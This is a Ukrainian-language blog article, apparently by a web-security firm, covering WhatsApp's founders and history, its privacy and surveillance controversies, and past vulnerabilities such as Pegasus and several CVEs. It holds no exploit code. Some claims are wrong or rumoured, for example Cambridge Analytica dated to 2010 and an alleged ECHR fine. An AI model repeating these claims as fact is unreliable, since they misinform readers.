Безпека веб-серверів, Cloud-платформ.
Надійний захист від атак відмова в обслуговуванні
Комплексний захист електронних ресурсів.
Пошук та видалення вірусів на веб-сайтах.
Захист та рішення безпеки для сайтів на WordPress.
Пентест сайтів і веб-додатків.
Безпека веб-серверів, Cloud-платформ.
Надійний захист від атак відмова в обслуговуванні
Комплексний захист електронних ресурсів.
Пошук та видалення вірусів на веб-сайтах.
Захист та рішення безпеки для сайтів на WordPress.
Пентест сайтів і веб-додатків.
Безпека веб-серверів, Cloud-платформ.
Надійний захист від атак відмова в обслуговуванні
Комплексний захист електронних ресурсів.
Пошук та видалення вірусів на веб-сайтах.
Захист та рішення безпеки для сайтів на WordPress.
Пентест сайтів і веб-додатків.
Безпека веб-серверів, Cloud-платформ.
Надійний захист від атак відмова в обслуговуванні
Комплексний захист електронних ресурсів.
Пошук та видалення вірусів на веб-сайтах.
Захист та рішення безпеки для сайтів на WordPress.
Пентест сайтів і веб-додатків.
На авансцені інтернет-месенджерів, здається, знову розгортається боротьба за пальму першості. Telegram вперто намагається не втратити свої позиції в Україні, а на його фоні WhatsApp намагається реанімувати себе – він галопом запускає одну функцію за іншою, вводить канали й навіть планує підключати штучний інтелект. Такий розгін викликає інтерес. А разом з тим зростає й кількість спроб зламати WhatsApp, використати в шпигунстві, шахрайстві та інших маніпуляціях. Я хочу, щоб користувачі знали які ризики та небезпеки чекають на них у найпопулярнішому в світі месенджері. Я розкрию секрети, про які ви ще не знали. Я розкажу про всі вразливості та продемонструю їх на практиці, а також обов’язково дам поради щодо захисту облікового запису WhatsApp.
ℹ️ Традиційно розпочинаємо наш матеріал з екскурсу в історію. Важливо зрозуміти точку відліку, філософію та концепцію WhatsApp. Хто його засновники, що це за люди? Щоб отримати цілісну картинку, необхідно сформувати глибинне уявлення про цей додаток.
WhatsApp розпочав свою діяльність як платформа для обміну миттєвими повідомленнями для смартфонів в далекому 2009 році. Його заснували колишні працівники компанії “Yahoo” – Ян Кум (Jan Koum) та Браян Ектон (Brian Acton).
Спробуємо коротко проаналізувати їх життєпис, а за одно визначити історичні періоди WhatsApp.
Ян Борисович Кум — народився 24 лютого 1976 року під Києвом, дитинство минало у Фастові. У 1992 році разом з бабцею та матір’ю емігрує у США, в Каліфорнію. Його батько залишився в Україні, працював будівельником і прожив там до самої смерті у 1997 році.
У США родина Кумів спочатку жила на соціальні виплати, їм видали двокімнатну квартиру і надавали талони на харчування. Мати працювала нянею, а 16-річному Яну навіть довелося деякий час попрацювати прибиральником у місцевому супермаркеті.
У 18 років хлопець вже серйозно захоплювався комп’ютерною літературою і програмуванням. Любив пограти у футбол та хокей. Займався боксом. Незабаром вступає до Державного університету Сан-Хосе, паралельно підпрацьовуючи в компанії “Ernst&Young” пентестером й дослідником з кібербезпеки.
Невдовзі Ян Кум заприятелював з Браяном Ектоном, який працював в компанії “Yahoo”. У 1998 році Яна теж запрошують в “Yahoo” й він отримує роботу мрії на посаді IT-інженера. Вони з Ектоном успішно працюють, товаришують, подорожують Америкою, обмінюються професійним досвідом. Робота приносила йому хороший дохід – за деякий час вдалось назбирати близько півмільйона доларів.
У 1999 році Ян відвідує хакерську конференцію “DefCon”, де завів перші професійні знайомства. Він був учасником хакерського клубу “w00w00”. Подейкують саме вони врятували Кума, коли “Yahoo” вибила з мережі потужна DDoS-атака.
З часом виникає ідея створення власного додатка для обміну миттєвими повідомленнями в Інтернеті для смартфонів, що дозволило б спілкуватися з близькими без значних витрат. Стільниковий зв’язок коштував тоді дорого і це мало стати альтернативою SMS/MMS та GSM.
Незабаром Ян придбав собі перший iPhone і був вражений потенціалом магазином додатків Apple Store. Вони разом з Браяном Ектоном збиралися в Алекса Фішмана (CEO of Bugsee) на кухні та довгими вечорами невтомно обговорювали майбутній додаток.
На думку останнього, непогано було б придумати систему статусів з короткими текстовими повідомленнями, які б з’являлися під аватарками користувачів. Пізніше саме ця ідея і принесе популярність месенджера.
Розробити додаток хлопцям допоміг програміст на iOS – Ігор Соломенніков, якого вони знайшли на порталі RentACoder.com (сьогодні він працює в Signal Messenger).
У 2000 році помирає мати Яна. 24 лютого 2009 року, у свій 33-й день народження, бувши круглим сиротою, Ян Кум оголосив про створення компанії WhatsApp Inc. в Каліфорнії.
Назва звучала як “what’s up” – “як справи” або “що нового”.
Браян Ектон — народився 17 лютого 1972 року в Мічигані. Його мати керувала власним транспортно-експедиторським бізнесом. Пізніше Браян переїхав до Флориди, де закінчив середню школу. Початково вступив на комп’ютерну інженерію в Університет Пенсільванії, був стипендіатом, але через рік перейшов у Стенфорд за спеціальністю “Інформатика”. У 1992 році працював системним адміністратором в “Rockwell International”, потім тестувальником в “Apple”. У 1994 закінчив Стенфордський університет й здобув ступінь бакалавра.
У 1996 році Браян приєднався до компанії “Yahoo” як інженер ІТ-інфраструктури й став їх 44 співробітником. Через деякий час він знайомиться з молодим тестувальником безпеки Яном Кумом, який на той час працював в компанії “Ernst&Young” й провів пентест на замовлення Yahoo. Вже через кілька років вони обоє працюватимуть в “Yahoo” й стануть приятелями.
У 2000-му Ектон встиг “прогоріти” на “бульбашці доткомів”, вклавши в них солідну суму.
У 2007 році разом з Кумом вони покидають “Yahoo”, після чого подають заявку на роботу в “Facebook”, але їх не беруть.
Вони навіть й подумати не могли, що саме завдяки цьому у 2009 році постане їх дітище – WhatsApp.
Перший реліз месенджера WhatsApp відбувся для пристроїв iPhone. Додаток завантажило не більше сотні людей. Переважно всі ті, які збиралися на піцу у Фішмана. WhatsApp мав чимало багів. Ян Кум в якийсь момент навіть розчарувався і вже подумував шукати роботу, але досвідчений Браян заспокоїв: “Не падай духом, постривай… Треба трохи зачекати.. Все буде. Побачиш.”.
В червні Apple ввела в iOS нову функцію – push-повідомлення. Тут і вистрілила “фішка” Фішмана зі статусами. Коли користувачі змінювали їх — додаток розсилав усім контактам push-повідомлення. Таким чином люди почали обмінюватись статусами: “Ти де?”, “Я в машині”, “Буду за 10 хв” і т.д. Хлопці зрозуміли, що створили мобільний месенджер. WhatsApp був врятований.
Ян з Браяном збиралися в місцевому хабі “Red Rock Cafe” в Маунтін-В’ю, Каліфорнії. Там вони активно доробляли WhatsApp. Другий реліз вийшов в серпні 2009-го, вже з підтримкою функції обміну повідомленнями. Загальна кількість користувачів зросла до 250 000.
Нічого подібного на той час не існувало, тому популярність месенджера збільшувалась в геометричній прогресії. Браян навіть залучив своїх колег з “Yahoo” й ті вклали $250 000 у початкове фінансування проєкту, отримавши за це свої частки.
Невдовзі почалися пошуки додаткових розробників, які б допомогли зробити WhatsApp кросплатформним і адаптувати під BlackBerry, Symbian та Android пристрої.
З допомогою тих же знайомих з “Yahoo”, хлопцям вдалось взяти в оренду приміщення під офіс. Більшу частину будівлі займала компанія “Evernote”, яка скептично поставилася до ентузіастів, які приїжали на роботу на велосипедах та працювали за дешевими столами Ikea, зігріваючись кавою та ковдрами.
Перший час Яну і Браяну доводилося працювати безкоштовно — за свій рахунок вони оплачували послуги брокерів для розсилки SMS-повідомлень активації додатка. Реєстрація у WhatsApp проходила по номеру телефона, що на той час було актуальним, адже, по-перше, було прямою альтернативою мобільному зв’язку, а по-друге, дозволяло легко знаходити друзів і комунікувати з ними.
До початку 2010 року вони вийшли на прибуток в 5000 доларів на місяць, що було достатньо, аби покрити деякі витрати. Станом на 2011 рік в WhatsApp працювало близько 20 співробітників і він входив у 20-тку кращих додатків Apple Store.
У 2013 році штат WhatsApp вже налічував 50 співробітників, а його користувацька аудиторія – 200 мільйонів. Потихеньку ним цікавилися великі гравці на ринку інформаційних технологій. Першим спроби покупки WhatsApp зробив Google, але вони були відхилені. У висновку, венчурний фонд “Sequoia Capital” зробив інвестицію на 50 мільйонів доларів, оцінивши WhatsApp у $1,5 мільярда. Це був успіх.
На зароблені кошти WhatsApp придбав стартап “SkyMobius” із Санта-Клари (США), які були розробниками месенджера Vtok. Vtok був популярним месенджером для мобільних пристроїв, що дозволяв користувачам здійснювати відеодзвінки та спілкуватися з допомогою текстових повідомлень. Він здобув популярність завдяки своїй сумісності з Google Talk (тепер Google Hangouts) і синхронізації контактів Google.
До команди WhatsApp також входили такі IT-спеціалісти як: Рік Рід (Software Engineer) і Євген Фуксман (Infrastructure Software Developer).
Справи йшли на краще. Аудиторія додатка вже налічувала понад 400 мільйони активних користувачів по всьому світі. WhatsApp став одним з найпопулярніших месенджерів світу.
Інвестори час від часу намагались використати свої важелі впливу, нав’язуючи рекламний бізнес, але Ян з Браяном тримали марку, позиціонуючи WhatsApp як серйозний додаток з ухилом на конфіденційність. Їхнім гаслом стало: “No Ads! No Games! No Gimmicks!” (“Жодної реклами, жодних ігор, жодних хитрощів!”).
У своєму блозі вони писали: “Ніхто не прокидається із захопленням, побачивши більше реклами. Ніхто не лягає спати, думаючи про рекламу, яку він побачить завтра… Коли йдеться про рекламу, ви, користувач, є продуктом“.
В одному з твітів Ян Кум процитував співака Каньє Веста, написавши: “Ти думаєш, що ти вільний, але ти раб грошей, крихітко”.
Щоб закрити питання реклами раз і назавжди, розробники спеціально ввели плату за WhatsApp – встановивши символічні 0,99 цента.
Однак, чудо не могло тривати вічно. Хлопці розуміли, що WhatsApp десь набирає свого піка, а далі піде спад. Щоб втриматись — треба ще більше коштів, досвіду і фарту.
2013 рік приніс їм $148 млн витрат, з яких $138 млн — збитки. Тож від пропозиції Facebook вони просто не змогли встояти. Це були шалені кошти, які кожному з них фактично забезпечили довічне гідне існування. Окрім того, Марк Цукерберг їх запевнив, що WhatsApp залишиться автономним і незалежним та не буде ділитися даними з Facebook.
19 лютого 2014 року компанія Facebook придбала WhatsApp за рекордні 19 мільярдів доларів. Браян володіє понад 20% акцій компанії. Ян Кум – 45%. Решта часток мають різноманітні інвестори та співзасновники.
З приходом Марка Цукерберга, “повістка дня” у WhatsApp дещо змінилася. Перше, що він зробив — це скасував плату і зробив месенджер “безкоштовним”. Додаток став частиною платформи Facebook й почав повільно, зате впевнено рухатися у бік реклами і маркетингу.
Цукерберг орієнтувався на масового споживача. Його головним критерієм була кількість. Якщо Кум з Ектоном були новаторами, уникали надмірного пафосу та піару й зберігали золоту середину “Безпека + комфорт”, то Цукерберг впевнено йшов до своєї мети — набрати перший мільярд.
Певний час колишні власники WhatsApp допомагали Марку, продовжуючи співпрацювати та покращувати додаток. У 2014 році Ян Кум увійшов до Ради правління Facebook. А у 2016 році, завдяки молодому криптографісту Моксі Марлінспайку (екс-інженер Twitter, засновник Open Whisper Systems / Signal), з яким вони познайомилися ще у 2013-му, було реалізовано довгоочікуване наскрізне End-to-End (E2EE) шифрування.
Це стало важливим етапом не тільки в історії розвитку WhatsApp, а й взагалі інтернет-комунікацій як таких. WhatsApp на той час по суті став першим захищеним месенджером, який за словами засновників, захищав користувачів від стеження, прослуховування і перехоплення. Месенджер навіть отримав схвальну оцінку товариства з питань безпеки та приватності “Electronic Frontier Foundation” – 6 балів із 7.
Пізніше, в інтерв’ю WIRED Кум та Ектон зізналися, що на них чинили тиск з метою залишити бекдор у шифруванні, який у середовищі спеціалістів з кібербезпеки ще називають “протоколом привида” (ghost protocol). Він передбачає таємне дублювання зашифрованого каналу. Кажуть, в Telegram такий бекдор є.
Імовірно, є він і в додатку Signal. Ось як заявляли представники шпигунського програмного забезпечення Cellbebrite на своєму сайті у 2020 році з приводу цього месенджера:
Протестувальники використовують додаток (ред. – Signal), щоб безпечно спілкуватися зі своїми командами, які збирають протестувальників, обговорюють тактику та підтримують зв’язок із поліцією. Злочинці також використовують цю програму для спілкування, надсилання вкладень і укладення незаконних угод, які вони хочуть тримати в таємниці та поза полем зору правоохоронних органів. Оскільки він шифрує практично всі свої метадані, щоб захистити своїх користувачів, правові органи намагаються вимагати від розробників зашифрованого програмного забезпечення вмикати «бекдор», який дає їм доступ до даних людей.
До досягнення таких домовленостей Cellebrite продовжує наполегливо працювати з правоохоронними органами, щоб дозволити агентствам розшифровувати та декодувати дані з програми Signal за допомогою Cellebrite Physical Analyzer і після вилучення, виконаного Cellebrite Advanced Services.
Ось як розповідає про бекдори і лазівки в алгоритмах шифрування американський журналіст Шейн Гарріс у своїй книзі “Війн@: Битви в кіберпросторі” (2019):
“Упродовж десяти останніх років АНБ спільно з британськими
колегами з Центру урядового зв’язку поклало чимало зусиль на боротьбу з криптографічними технологіями, інсталюючи приховані
вразливості в поширені стандарти шифрування. Шифрування – це
процедура перетворення даних (наприклад, електронного листа) в
мішанину цифр і символів, яку можна розшифрувати лише за допомогою ключа, яким володіє адресат. Якось АНБ вступило у відкриту боротьбу за отримання доступу до ключів шифрування, щоб розшифровувати повідомлення за власним вибором, але програло битву. Тоді агентство взялося за послаблення алгоритмів шифрування, які використовуються насамперед для кодування онлайн-комунікацій. АНБ – це домівка найкращих у світі криптографів, яких регулярно консультують різноманітні інституції, зокрема й державні агентства, щодо збільшення стійкості алгоритмів шифрування.”
В травні 2024 року видання The Interpecpt заявило, що у березні команда безпеки WhatsApp випустила внутрішнє попередження для своїх колег: попри потужне шифрування програмного забезпечення, користувачі залишаються вразливими до небезпечної форми урядового стеження. Інженери WhatsApp буцімто писали, що державні установи «обходили шифрування», щоб з’ясувати, які користувачі спілкуються один з одним, членство в приватних групах і, можливо, навіть їх місцеперебування. Вразливість заснована на «аналізі трафіку» — техніці мережевого моніторингу, яка існує десятиліттями і базується на аналізі інтернет-трафіку у великому національному масштабі. Про неї писав New York Times в контексті можливості російських спецслужб аналізувати трафік популярних месенджерів.
У вересні 2017 року Браян Ектон покинув WhatsApp, голосно стукнувши дверима. У інтерв’ю Forbes він розповів про те, що його мета була “зробити приватне спілкування приватним і всюдисущим”, а натомість Facebook намагався монетизувати WhatsApp усіма можливими способами, обходячи регуляторів ЄС.
У квітні 2018 року про те, що покидає WhatsApp і йде з Ради директорів Facebook через внутрішні розбіжності заявив Ян Кум. Відтепер Цукербергу вже ніхто не “заважав” монетизувати WhatsApp, який сягнув пікової точки в 1,5 мільярда користувачів та став найпопулярнішим додатком всіх часів і народів на всіх континентах світу.
Без Кума та Ектона, WhatsApp швидко прийняв “відтінок” Facebook й поступово почав деградувати. Месенджер під’єднали до глобальної мережі ADINT – рекламно-аналітичної машини, “силу” якої відразу відчули на собі користувачі. З’явилося безліч пліток та історій про те як WhatsApp таємно підслуховує своїх користувачів й підсовує їм релевантну рекламу. Європейський Суд по правах людини у відповідь почав розслідування і оштрафував компанію за порушення конфіденційності.
У 2018 році Meta запустили комерційну версію для бізнесу – WhatsApp Business. У 2020 в Індії з’явилася платіжна система WhatsApp Payments, яка дозволила проводити фінансові операції через месенджер. Також була укладена угода з найбільшими банками Бразилії, яка займає перше місце за кількістю користувачів WhatsApp.
У січні 2021-го Цукерберг оновив Політику конфіденційності WhatsApp, у якій відкрито заявлялось про обмін даними з материнською компанією Meta. Ті, хто не прийняли її до 8 лютого 2021 року, повинні були втратити доступ до месенджера. Це викликало значний резонанс і хвилю обурення серед користувачів. Багато користувачів почали масово переходити на інші платформи обміну повідомленнями, такі як Signal і Telegram.
29 листопада 2021 року видання Rolling Stone оприлюднило секретний документ, який показував перелік метаданих, які популярні месенджери надають правоохоронним органам на їх запит. Виявилося, що найбільше інформації “зливає” WhatsApp:
У 2022 році в журнал Forbes просочилися шокуючі факти, що WhatsApp допомогав федералам США вести цифрове стеження за 7 користувачами з Китаю та Макао. WhatsApp дали вказівку контролювати їх IP-адреси та номери телефонів, а також контакти й статистику використання. Негласне стеження здійснювалося відповідно до Закону США 1986 року “Про конфіденційність електронних комунікацій” (Electronic Communications Privacy Act of 1986 (ECPA)). Є припущення, що ці люди торгували небезпечними опіум-наркотиками (опіоїдами).
Журналісти Forbes проаналізували також інші судові документи та знайшли кілька цікавих випадків. Так, у 2016 році суд штату Огайо запросив у WhatsApp відстежити номери телефонів й повідомлень підозрюваного в рамках розслідування зловживання наркотиками. Надавались такі дані як: дата, час і тривалість викликів, адресна книга. Також вимагалась інформація про будь-які SMS-повідомлення, до яких WhatsApp мав доступ. Це стеження мало тривати 60 днів, не розголошуючи підозрюваному про це. Також наголошувалось, якщо месенджер ще не має «опції ідентифікації абонента або подібної функції», він мав створити її, аби правоохоронні органи могли ефективніше відслідковувати свої цілі. З іншими наказами можна ознайомитись тут.
Раніше у 2013 році екс-співробітник АНБ і системний інженер Едвард Сноуден опублікував в британській газеті “The Guardian” конфіденційні спецматеріали про те, що популярні соцмережі і месенджери (зокрема Facebook і WhatsApp) тривалий час таємно використовувалися в роботі програм електронної розвідки і шпіонажу, таких як: XKeyscore, PRISM, ECHELON та інших.
7 березня 2017 року видання хактивістів WikiLeaks опублікувало серію витоків Центрального розвідувального агенства США (ЦРУ, CIA) під назвою “Vault7”. В ньому зокрема йшлося про хакерський арсенал ЦРУ, який дозволяє обійти шифрування популярних додатків для миттєвого обміну повідомленнями – WhatsApp, Signal, Telegram, Wiebo, Confide і Cloackman шляхом зламу мобільних пристроїв.
За офіційною статистикою, щорічно компанія Meta задовільняє сотні державних запитів з різних країн щодо персональних даних користувачів її платформ, включаючи вихідні та вхідні повідомлення. І кількість їх стабільно росте рік за роком:
Видання ProPublica опублікувало матеріал у якому йдеться про численних модераторів (понад 1000), яких наймає й утримує Meta для перевірки контенту в WhatsApp. Модератори переважно віком від 20 до 30 років, розмовляють різними мовами, багато хто з минулим досвідом роботи продавцями в магазинах, контролерами бакалійних магазинів і бариста, найняті підрядниками. Оплата праці починається близько 16,50 доларів на годину.
Щотижня вони перевіряють мільйони вмісту WhatsApp. Оскільки контент зашифрований, системи штучного інтелекту не можуть автоматично сканувати всі чати, зображення та відео, як це роблять у Facebook та Instagram. Щойно користувачі натискають в месенджері кнопку «Повідомити», визначаючи повідомлення як таке, що ймовірно порушує умови обслуговування платформи, воно потрапляє до модераторів.
Разом з повідомленнями, вони отримують безліч метаданих: імена та зображення профілів користувачів, їх номер телефону, статус, рівень заряду акумулятора, мова та часовий пояс, IMEI, MAC та IP-адреса, рівень сигналу Wi-Fi, операційна система, пов’язані облікові записи Facebook та Instagram, час останнього візиту та будь-яка попередня історія.
Модератори перевіряють широкий спектр категорій, зокрема «Повідомлення про спам», «Громадський поганий діяч» (політична мова ненависті та дезінформація), «Глобальна достовірна загроза тероризму», «CEI» (зображення, що використовують дітей) і «CP» (дитяча порнографія). Модератори можуть поставити обліковий запис користувача на “моніторинг”, тимчасово або навічно забанити його, а в особливих випадках – передати правоохоронним органам.
Усі ці та інші факти врешті-решт змінили імідж та репутацію, а разом з тим й портрет цільового користувача WhatsApp. Додаток почав помітно просідати й відставати від конкурентів. Гасло “Конфіденційність у нашому ДНК” більше не сприймалось як щось серйозне. Відомі компанії та люди відверто почали закликати користувачів до переходу на інші платформи.
Наприклад, Ілон Маск опублікував твіт “Користуйтесь Signal.” Те саме зробив Сноуден. Після зламу Facebook, коли було злито дані понад 500 млн користувачів, виявилося, що номер Цукерберга був прив’язаний до Signal, а не WhatsApp. Джуліан Ассанж на початку повномасштабної війни порадив українцям застосовувати P2P-месенджер Briar.
У висновку, цим скористався Telegram – прямий конкурент WhatsApp. Йому розкрилися величезні перспективи та можливості. Як заявив Павло Дуров, близько 8 мільйонів користувачів перейшло з WhatsApp у Telegram від моменту його продажу.
Браян Ектон у подальшому разом з Моксі Марлінспайком заснували Signal Foundation та месенджер Signal, який сьогодні є найуспішнішим захищеним аналогом WhatsApp. Як пишуть ЗМІ, Браян одружений на українці.
Щодо Яна Кума, то він почав колекціонувати рідкісні Porsche з повітряним охолодженням та захоплюватись грою в алтимат-фрісбі. Має власну яхту. Зустрічається з Евеліною Мамбетовою, яка родом з кримських татар. Пожертвував 1 мільйон доларів на проєкт FreeBSD, що є найбільшим донатом в історії. Після початку повномасштабної війни рф проти України, зробив чимало донатів громадам і організаціям іудеїв, які надають гуманітарну допомогу біженцям війни.
Сьогодні WhatsApp знову пробує реабілітуватись, вводить одну функцію за іншою, намагається заохочувати користувачів.
Пропонуємо освіжити пам’ять й згадати які інциденти та вразливості були пов’язані з WhatsApp за останні роки.
🔴 Інцидент з Cambridge Analytica (2010)
У 2010 році персональні дані мільйонів користувачів Facebook таємно збиралися британською консалтинговою компанією “Cambridge Analytica”, які були використані для різних цілей, у тому числі політичних. Дані були зібрані з допомогою додатка “This Is Your Digital Life”, розробленого американським вченим Александром Коганом. Додаток пропонував користувачам Facebook пройти невеличкий тест для побудови “портрету особистості” та називав себе “дослідницькою програмою, яку використовують психологи”. Як виявилося, він отримував доступ не лише до сторінки користувача, а й усіх друзів, масово збираючи дані з блоку Facebook Open Graph, де вказувались ідентифікаційні дані. Інформацію про зловживання оприлюднив у 2018 році Крістофер Вайлі – колишній співробітник Cambridge Analytica.
Така халатність стала результатом бізнес-моделі Цукерберга. Як сказав Сенді Паракілас, колишній операційний менеджер Facebook: «Модель полягала в створенні, зростанні та монетизації. Захист користувачів не вписувався в це». Він також додав, що Facebook не проводив жодного аудиту розробників за час їх роботи.
Результатом скандалу стали численні судові розгляди, штрафи та падіння акцій Facebook, які досягнули свого найнижчого рівня в історії. Скандал дійшов до того, що засновнику Facebook Марку Цукербергу довелося давати офіційні свідчення перед кількома комітетами Конгресу Сполучених Штатів. Чимало авторитетних компаній відвернулися від Facebook. У мережі ширився хештег #DeleteFacebook, який навіть поширив Браян Ектон. Компанія Cambridge Analytica збанкрутувала. На Netflix випустили документальний фільм про ці події під назвою “The Great Hack”.
WhatsApp месенджер теж постав перед ударом, адже він “зливав” дані Facebook. Щоб вирішити цю проблему, Політику конфіденційності оновили, чітко вказавши, що інформація більше не передаватиметься Facebook для маркетингу, при цьому все одно дозволяючи Facebook використовувати дані для “внутрішніх цілей” для покращення своїх продуктів.
🔴 Злам WhatsApp шпигунським ПЗ Pegasus Spyware (2019)
У 2019 році стало відомо, що зловмисне шпигунське програмне забезпечення під назвою “Pegasus”, скориставшись вразливістю нульового дня (CVE-2019-3568) в додатку WhatsApp, проникло на пристрої мільйонів користувачів та могло переглядати, копіювати, модифікувати, перехоплювати і прослуховувати будь-які повідомлення, які користувачі відправляли по месенджеру, і не тільки.
Pegasus розроблявся у військово-політичних цілях ізраїльською компанією NSO Group (відомі також як “Q cyber technology”). Подейкують, серед учасників є ветерани підрозділу кіберрозвідки Ізраїлю – “8200”. Шпигунський софт названий на честь Пегаса – крилатого коня у давньогрецькій міфології. Вперше його помітили у 2016 році. За даними New York Times, Pegasus закуповували уряди різних країн з метою розслідувань національної безпеки – стежити за політиками, журналістами, юристами, дисидентами, активістами, спецслужбістами, гангстерами, терористами тощо. Як повідомляє міжнародний проєкт “Forbidden Stories” – щонайменше 180 журналістів по всьому світу стали жертвами Pegasus.
Pegasus являє собою експлойт або набір експлойтів, який розгортається на мобільному пристрої жертви через інтернет-з’єднання з вразливим додатком, наприклад це може бути вхідний дзвінок або посилання у WhatsApp. Причому, жодних дій від жертви не вимагається – так-звана zero-click/zero-touch атака. Єдина вимога – наявність вразливого смартфона або додатка. Усе відбувається дистанційно через віддалене виконання коду (Remote Code Execution). Платформа і операційна система – значення не мають.
Після вдалого проникнення, Pegasus отримує root-права і повністю бере під контроль пристрій. Керується віддалено через центральний сервер. Після закінчення операції – самознищується, не залишаючи по собі жодних слідів чи доказів. Фактично, це кіберзброя нового покоління.
У 2017 році Facebook подав до суду на NSO Group. Лише у травні 2019 року WhatsApp офіційно заявив, що пропатчив цю діру безпеки й закликав користувачів оновитись до останньої версії. За деякими даними, постраждало більше 1400 користувачів. Серед них були громадські діячі. Ходять чутки, Цукерберг намагався купити Pegasus в NSO Group, за що і поплатився.
Однак на цьому, історія з Pegasus не закінчилася. У 2018 році було зламано мобільний пристрій американського мільярдера, власника Amazon і Washington Post Джеффа Безоса. Йому надіслали у WhatsApp відеофайл, який виявився шкідливим. У результаті запустився експлойт, який за годину викачав з телефону усі дані.
Послужив “троянським конем” WhatsApp й у справі зламу мобільного пристрою екс-прем’єр-міністерки Ліз Трасс. Чимало фахівців безпеки розкритикували сам факт використання WhatsApp урядовцями. Один із експертів, професор Ентоні Гліз заявив: “Ми маємо міністрів, які використовують свої приватні телефони для ведення урядових справ через WhatsApp і свою особисту електронну пошту, і це має бути негайно припинено. Це абсолютно безвідповідально.”.
До слова, у багатьох країнах ЄС, наприклад Швейцарії та Франції на офіційному рівні заборонено використання WhatsApp посадовими особами, зокрема військовими та політиками. У Великобританії на даний момент до цього справа ще не дійшла, але після інциденту з Трасс була видана брошура з рекомендаціями для чиновників щодо використання WhatsApp-месенджера.
У червні 2020-го британське видання The Guardian опублікувало розслідування, у ході якого стало відомо, що спікер регіонального парламенту Каталонії Роджер Торрент та принаймні ще двоє його прихильників стали жертвами шпигунського програмного забезпечення NSO, яке експлуатувало дірки безпеки WhatsApp.
У 2023 році просочилася новина, що Національна гвардія Техасу незаконно стежила через WhatsApp за мігрантами з Латинської Америки. Офіцери таємно проникли у групові чати з метою проведення шпигунської операції “Самотня зірка”.
Підсумовуючи, можна сказати, що факт існування Pegasus є тривожним дзвіночком не лише для користувачів WhatsApp, а й для усього людства загалом, адже підриває основи безпечного та вільного інтернету і провокує невидимі зловживання, котрі порушують конституційні права та свободи людини.
До речі, Pegasus не виняток. На сьогодні існує ціле сімейство зловмисного софту – Chrysaor, Candiru, Cellebrite, Phantom, Predator.
🔴 Витік даних 487 мійльйонів користувачів WhatsApp (2022)
16 листопада 2022 року на одному з хакерських форумів з’явилося оголошення про продаж бази даних з 487 мільйонами мобільних номерів активних користувачів WhatsApp з різних країн світу.
За припущеннями експертів, ці дані зловмисникам вдалося зібрати з допомогою скрапінгу або парсингу чатів WhatsApp. Meta ніяк не прокоментувала цю подію, хоча це вже другий великий витік, починаючи з 2021 року, коли було злито дані більше 500 мільйонів користувачів Facebook.
Витік телефонних номерів небезпечний тим, що він може бути використаний зловмисниками для різноманітних шахрайських операцій – інформаційно-психологічних атак, спаму, фішингу, вішингу, смішингу, видавання себе за іншу особу і так далі. Так, в грудні 2023-го в українських ЗМІ з’явилася новина про те, що тисячі українців стали жертвами махінацій у WhatsApp – їм писали люди з різних закордонних номерів, пропонуючи нібито роботу. У висновку, з них видурювали значні суми.
У 2018-2019 роках дослідники безпеки з “Check Point Research” опублікували ряд вразливостей, присутніх у месенджері WhatsApp:
У грудні 2019 року WhatsApp підтвердив вразливість CVE-2019-11932, яка дозволяла використовувати шкідливий файл зображення GIF для отримання доступу до даних користувача. Коли одержувач відкривав галерею в WhatsApp аввтоматично виконувався віддалений код (Remote Code Execution) і відбувався злам. Вразливість була знайдена дослідником із Сінгапура у функції DDGifSlurp для Android у версіях Whatsapp до 2.19.244. Недолік було виправлено в наступних оновленнях.
У грудні 2021 року британська компанія з кібербезпеки NCC Group Security Services провела оцінку захищеності WhatsApp, зокрема бібліотеки з відкритим кодом opaque-ke, яка застосовується для реалізації протоколу обміну ключами шифрування. В рамках аудиту було виявлено критичні вразлиовсті, зокрема такі проблеми безпеки як: недостатня перевірка вхідних даних, ризик розкриття пароля клієнта сервером через експорт ключа, відсутня перевірка довжини, помилки реалізації I2OSP, застарілі залежності та інше. Усі вразливості були виправлені.
На початку 2022 року стало відомо, що стартап з кібербезпеки “Boldend” із Сан-Дієго, США розробив інструменти для зламу шифрування WhatsApp, отримуючи доступ до даних користувачів з 2017 року. Найцікавіше, що стартап фінансувався інвестором Facebook Пітером Тілем. Вразливість була виправлена в січні 2021 року.
25 вересня 2022 року було повідомлено про дві критичні вразливості у функції відеодзвінків WhatsApp на Android (CVE-2022-36934, CVE-2022-27492). Помилка цілочисельного переповнення дозволяла зловмисникам отримати повний контроль над програмою жертви після встановлення відеодзвінка між двома користувачами WhatsApp. Нападники через корисне навантаження проексплуатували компонент Video Call Handler, що призвело до переповнення буфера і дозволило переписати пам’ять програми.
У 2023 році NCC Group знову провели аудит кібербезпеки на замовлення Meta – була досліджена бібліотека Rust з відкритим кодом Auditable Key Directory (AKD). Вона дозволяє користувачам відстежувати зміни в загальнодоступних ключах, пов’язаних з обліковими записами (функція “60-значний код безпеки”). Було виявлено 1 вразливість середнього ступеня тяжкості, 8 низького та 6 інформаційних зауважень. Зокрема, проблеми з оновленням ключів шифрування, загальнодоступність деяких функцій API, хешування VRF повертає неправильний результат, що призводить до збоїв. Усі проблеми були виправлені.
Джерела:
WhatsApp – це безкоштовна централізована платформа пропрієтарного типу для інтернет-комунікації з підтримкою наскрізного End-to-End шифрування. Належить американському технологічному конгломерату Meta Platforms. Дозволяє користувачам надсилати текстові, голосові та відеоповідомлення, здійснювати голосові та відеодзвінки, а також ділитися зображеннями, документами, місцезнаходженням та іншим вмістом.
Архітектура WhatsApp є клієнт-серверною (client-server). Тобто є клієнт і сервер, які обмінюються даними між собою у зашифрованому вигляді. Клієнт – це додаток. Сервер – це комп’ютер, який обслуговується UNIX-подібною операційною системою та з’єднується з базами даних, мережевими службами й інтерфейсами, а також іншими серверами, з яких отримує інформацію й пересилає по транспортному TCP-протоколу до клієнта. Аналогічно він отримує від нього дані. На архітектурі client-server побудовані майже усі онлайн-додатки та інтернет-сервіси, такі як Viber, Skype, iMessage, Telegram та інші.
Розглянемо технологічний стек WhatsApp, який умовно можна розділити на BackEnd (програмно-апаратні технології) і FrontEnd (технології інтерфейсу).
Примітка: Хочемо зазначити, що ми не знаємо точних технічних характеристик інфраструктури WhatsApp і спробуємо змоделювати її на основі відкритих джерел. Аргументація, використана для проведення цього аналізу, відноситься до зовнішнього типу «чорної скриньки», тобто без безпосереднього допуску до внутрішньої інфраструктури платформи.
⚡BackEnd WhatsApp:
Окрім цього, застосовуються системи доставки контенту (CDN), система інтеграції (API), алгоритми машинного навчання (ML), технології штучного інтелекту (AI) та обробка природної мови (NLP).
⚡FrontEnd WhatsApp:
Джерела:
